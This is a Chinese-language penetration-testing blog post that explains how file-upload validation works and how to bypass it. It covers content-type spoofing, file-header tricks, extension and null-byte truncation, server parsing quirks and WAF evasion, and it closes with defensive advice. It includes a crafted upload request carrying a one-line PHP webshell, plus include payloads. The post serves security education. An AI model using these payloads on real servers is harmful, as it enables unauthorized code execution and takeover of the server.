文件上传漏洞(绕过姿势)

最新推荐文章于 2024-03-06 16:52:15 发布
最新推荐文章于 2024-03-06 16:52:15 发布
阅读量3.1k 收藏 8
点赞数 1
文章标签: 漏洞

0X00 前言

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。

文件上传校验姿势

  • 客户端javascript校验(一般只校验后缀名)
  • 服务端校验
    • 文件头content-type字段校验(image/gif)
    • 文件内容头校验(GIF89a)
    • 后缀名黑名单校验
    • 后缀名白名单校验
    • WAF设备校验(根据不同的WAF产品而定)

1.客户端校验

  一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。
  判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包。

2.服务端校验

2.1 content-type字段校验

  这里以PHP代码为例,模拟web服务器端的校验代码

<?php
        if($_FILES['userfile']['type'] != "image/gif")  #这里对上传的文件类型进行判断,如果不是image/gif类型便返回错误。
                {   
                 echo "Sorry, we only allow uploading GIF images";
                 exit;
                 }
         $uploaddir = 'uploads/';
         $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
         if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
             {
                 echo "File is valid, and was successfully uploaded.\n";
                } else {
                     echo "File uploading failed.\n";
    }
     ?>

可以看到代码对上传文件的文件类型进行了判断,如果不是图片类型,返回错误。

2.2 文件头校验

  可以通过自己写正则匹配,判断文件头内容是否符合要求,这里举几个常见的文件头对应关系:
(1) .JPEG;.JPE;.JPG,”Exif” “JFIF”等
(2) .gif,”GIF89a”
(3) .zip,”Zip Compressed”
(4) .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”

文件上传绕过校验姿势

  • 客户端绕过(抓包改包)
  • 服务端绕过
    • 文件类型
    • 文件头
    • 文件后缀名
  • 配合文件包含漏洞绕过
  • 配合服务器解析漏洞绕过
  • CMS、编辑器漏洞绕过
  • 配合操作系统文件命名规则绕过
  • 配合其他规则绕过
  • WAF绕过

1.客户端绕过

  可以利用burp抓包改包,先上传一个gif类型的木马,然后通过burp将其改为asp/php/jsp后缀名即可。

2.服务端绕过

2.1 文件类型绕过

  我们可以通过抓包,将content-type字段改为image/gif

POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif (原为 Content-Type: text/plain)
<?php system($_GET['command']);?>
--xYzZY-

2.2 文件头绕过

  在木马内容基础上再加了一些文件信息,有点像下面的结构
GIF89a

2.3 文件后缀名绕过

前提:黑名单校验
黑名单检测:一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件。

绕过方法:
(1)找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
(2)可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表:
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee

3.配合文件包含漏洞

前提:校验规则只校验当文件后缀名为asp/php/jsp的文件内容是否为木马。

绕过方式:(这里拿php为例,此漏洞主要存在于PHP中)
(1)先上传一个内容为木马的txt后缀文件,因为后缀名的关系没有检验内容;
(2)然后再上传一个.php的文件,内容为

<?php Include(“上传的txt文件路径”);?>

此时,这个php文件就会去引用txt文件的内容,从而绕过校验,下面列举包含的语法: 

#PHP    
<?php Include("上传的txt文件路径");?> 
#ASP    
<!--#include file="上传的txt文件路径" -->
#JSP    
<jsp:inclde page="上传的txt文件路径"/>
or  
<%@include file="上传的txt文件路径"%>

4.配合服务器解析漏洞

如配合Apache解析漏洞,test.php.rar,会被Apache解析为test.php。
(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。

5.配合操作系统文件命令规则

(1)上传不符合windows文件命名规则的文件名

    test.asp.
  test.asp(空格)
  test.php:1.jpg
  test.php::$DATA
  shell.php::$DATA…….

会被windows系统自动去掉不符合规则符号后面的内容。
(2)linux下后缀名大小写
在linux下,如果上传php不被解析,可以试试上传pHp后缀的文件名。

6.CMS、编辑器漏洞

(1)CMS漏洞:比如说JCMS等存在的漏洞,可以针对不同CMS存在的上传漏洞进行绕过。
(2)编辑器漏洞:比如FCK,ewebeditor等,可以针对编辑器的漏洞进行绕过。
这里只是听说过,没有做更多的了解,详细了解后,再总结。

7.配合其他规则

(1)0x00截断:基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候

test.php(0x00).jpg
test.php%00.jpg

  路径/upload/1.php(0x00),文件名1.jpg,结合/upload/1.php(0x00)/1.jpg
伪代码演示:

name= getname(httprequest) //假如这时候获取到的文件名是 help.asp.jpg(asp 后面为 0x00)
type =gettype(name)        //而在 gettype()函数里处理方式是从后往前扫描扩展名,所以判断为 jpg
if(type == jpg)
   SaveFileToPath(UploadPath.name, name)   //但在这里却是以 0x00 作为文件名截断
//最后以 help.asp 存入路径里

这种利用办法只在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断。

8.WAF绕过

8.1 垃圾数据

有些主机WAF软件为了不影响web服务器的性能,会对校验的用户数据设置大小上限,比如1M。此种情况可以构造一个大文件,前面1M的内容为垃圾内容,后面才是真正的木马内容,便可以绕过WAF对文件内容的校验;可以将垃圾数据加上Content-Disposition参数后面,参数内容过长,可能会导致waf检测出错。

8.2 filename

针对早期版本安全狗,可以多加一个filename
或者将filename换位置,在IIS6.0下如果我们换一种书写方式,把filename放在其他地方:

8.3 POST/GET

有些WAF的规则是:如果数据包为POST类型,则校验数据包内容。
此种情况可以上传一个POST型的数据包,抓包将POST改为GET。

8.5 利用waf本身缺陷

删除实体里面的Conten-Type字段
第一种是删除Content整行,第二种是删除C后面的字符。删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php。

正常包:Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
构造包:Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"

修改Content-Disposition字段值的大小写

文件重命名绕过

如果web程序会将filename除了扩展名的那段重命名的话,那么还可以构造更多的点、符号等等。

文件校验的几点建议

  • 文件扩展名服务端白名单校验。
  • 文件内容服务端校验。
  • 上传文件重命名。

  • 隐藏上传文件路径。

      以上几点,可以防御绝大多数上传漏洞,但是需要跟服务器容器结合起来。如果解析漏洞依然存在,那么没有绝对的安全。

原文链接文件上传漏洞(绕过姿势)

「已注销」
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2022年文件上传漏洞绕过姿势整理,过waf版
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
Web渗透-文件上传漏洞知识总结及漏洞复现
陈珺的博客
08-15 1429
文件上传漏洞知识总结及漏洞复现文件上传概要文件上传漏洞成因文件解析漏洞路径截断IIS 5.x/6.0解析漏洞绕过上传漏洞漏洞修复/应对方法文件上传漏洞复现 文件上传概要 Web应用程序通常会有文件上传功能,例如论坛的附件上传,上传图片/头像/Zip压缩包等,只要被Web应用程序允许上传文件,就可能存在文件上传漏洞。在不对被上传的文件进行限制/过滤或者限制被绕过,从而上传恶意文件、可执行脚本到服务器上,进一步导致服务器沦陷 如何确认Web应用程序是否存在上传漏洞呢?例如论坛由PHP开发,用户可上传头像,也就是
Content-type详解
qq_44741577的博客
03-06 3940
Content-Type(MediaType),即是Internet Media Type,互联网媒体类型,也叫做MIME类型。在互联网中有成百上千中不同的数据类型,HTTP在传输数据对象时会为他们打上称为MIME的数据格式标签,用于区分数据类型。最初MIME是用于电子邮件系统的,后来HTTP也采用了这一方案。在HTTP协议消息头中,使用来表示请求和响应中的媒体类型信息。它用来告诉服务端如何处理请求的数据,以及告诉客户端(一般是浏览器)如何解析响应的数据,比如显示图片,解析并展示html等等。
web渗透-------WEB漏洞文件上传
hhhjjjllll的博客
05-12 998
文件上传漏洞是指 Web 服务器允许用户将文件上传至其文件系统,但这些文件可能并没有经过充分的验证,如文件名称、类型、内容或大小等。未能正确执行这些限制就意味着即使最基本的图像上传功能也可能用于上传任意具有潜在危险的文件,里面甚至包括远程代码执行的服务器端脚本文件。在某些情况下,上传文件的行为本身就足以造成损害,其他攻击对该文件后续 HTTP 的请求,通常是为了触发服务器执行该文件。
Web渗透测试----3、文件上传漏洞
七天
12-23 2874
文章目录一、文件上传漏洞二、客户端校验上传文件的方式及绕过2.1、客户端JS验证2.2.1、前端js验证代码2.2.2、绕过前端JS验证三、服务端校验文件上传的方式及绕过3.1、通过文件后缀验证及绕过3.2 、通过文件类型验证及绕过3.3 、通过文件内容验证及绕过3.4、WAF进行校验及绕过3.5、竞争上传绕过3.6、.htaccess文件绕过3.7、根据操作系统特性进行绕过3.8、通过post和get方法绕过3.9、通过文件截断绕过攻击3.10、利用文件包含或解析漏洞绕过上传四、文件上传漏洞的防御总结 .
WEB渗透——文件上传漏洞(一)
果子哥丶的博客
03-13 1004
文件上传漏洞(一) 环境准备: OWASP_Broken_Web_Apps —— 靶机 Kali_Linux-2018.2-vm-amd64 —— 攻击机 文件上传漏洞原理: 制作PHP文件——一句话木马 chopper就是密码 利用文件上传漏洞,原本是要求上传image,但却可以上传PHP文件。上传成功后在网页加载该文件,将 …/…/hackable/uploads/Xshell....
文件上传绕过方法汇总
xiaoheizi的博客
06-12 5624
先上传1.php,它的目的是让服务器上的php来创建一个2.php,我们在1.php被删除之前访问到他,就可以在服务器中创建2.php,2.php是一个木马文件,但是这个是系统自身创建的,所以不会被删除。假如我不断的上传发包,然后我同时也不断的访问那个我们上传上去的文件的地址,我们就开始和服务器的函数比手速了,函数执行都是要时间的,如果我这边上传上去,且没有删除,那个时间可能很短,然后被我访问到了,岂不是就可以执行PHP了。
文件上传漏洞
realmels的博客
07-02 1862
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend 介绍 文件上传漏洞指用户将恶意代码文.
网络安全之文件上传漏洞
qq_52074678的博客
05-07 6285
一.文件上传漏洞原理🐱‍🏍🐱‍🏍🐱‍🏍 1.文件上传功能 网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护。 2.一句话木马 二..
Linux文件系统--文件类型
Ucan_Uup的博客
09-08 895
Linux中一切都是文件,文件类型有多种,使用ls -l命令可以查看文件属性,所显示结果的第一列的第一个字符用来表示文件类型,如下: 1.普通文件 第一列第一个字符为“-”的文件为普通文件。 创建普通文件我们用:touch newfile 命令 删除普通文件我们用:rm newfile 命令 2.目录文件 第一列第一个字符为“d”(directory)的文件为目录文件。 创建目录文件我们用:mkdir directory 命令 删除空目录文件我们用:rmdir directory 命令 删除非空目录文件
渗透测试笔记(一)——文件上传漏洞渗透及防御
m0_67044952的博客
06-06 985
测试渗透机:Kali-Linux-2021.4a-vmware-amd64目标靶机:OWASP Broken Web Application VM 1.2 如果恶意文件如PHP、ASP等执行文件绕过Web应用并顺利执行,则相当于黑客拿到了Webshell。一旦黑客拿到Webshell,则可以拿到Web应用数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网。SQL注入攻击对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制。下面是一个文件上传界面,可以上传图像,
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
AWD攻防漏洞分析——文件上传
01-20
概述 这个漏洞在DVBBS6.0时代被hacker们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级高,入侵中上传漏洞也是常见的漏洞。 导致改漏洞的原因在于代码...7、绕过服务端漏洞上传webshell 8、利用.htacc
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
spring java图片上传源码.rar
最新发布
04-26
源码实现了图片上传功能,可供相关功能开发的小伙伴参考学习使用。
新入职员工工作总结范文大全(篇).docx
04-26
工作总结,新年计划,岗位总结,工作汇报,个人总结,述职报告,范文下载,新年总结,新建计划。
本项目内容为《SpringBoot 2.X 基础教程》配套源码.zip
04-26
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
IMG_20240426_195457.jpg
04-26
IMG_20240426_195457.jpg
9.文件上传漏洞绕过方式
05-15
文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过应用程序的安全机制,将恶意文件上传到服务器上,从而实现攻击目的。常见的文件上传漏洞绕过方式包括以下几种: 1. 修改文件类型:攻击者可以修改上传文件的文件类型,将恶意文件伪装成常见文件类型,绕过检测机制。 2. 绕过文件类型检测:上传文件时,应用程序会检测文件类型,如果上传的文件类型不符合要求,则会拒绝上传。攻击者可以通过修改 HTTP 头部信息或者使用特殊字符等方式,绕过文件类型检测。 3. 绕过文件大小限制:应用程序通常会限制上传文件的大小,攻击者可以通过分割文件、压缩文件等方式,绕过文件大小限制。 4. 绕过文件路径检测:应用程序会检测上传文件的路径,如果路径不符合要求,则会拒绝上传。攻击者可以通过构造特殊的路径,绕过文件路径检测。 5. 绕过文件名检测:应用程序会检测上传文件的文件名,如果文件名不符合要求,则会拒绝上传。攻击者可以通过构造特殊的文件名,绕过文件名检测。 为了避免文件上传漏洞的攻击,应用程序开发人员可以采取以下措施: 1. 对上传文件进行严格的类型、大小、路径、文件名检测,确保上传的文件符合要求。 2. 对上传文件进行病毒扫描和安全检测,确保上传的文件不包含恶意代码。 3. 限制上传文件的存储路径,确保上传的文件不会对系统造成危害。 4. 对上传文件进行权限控制,确保只有授权的用户才能访问上传的文件。 5. 定期更新应用程序和服务器的安全补丁,确保系统处于最新的安全状态。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值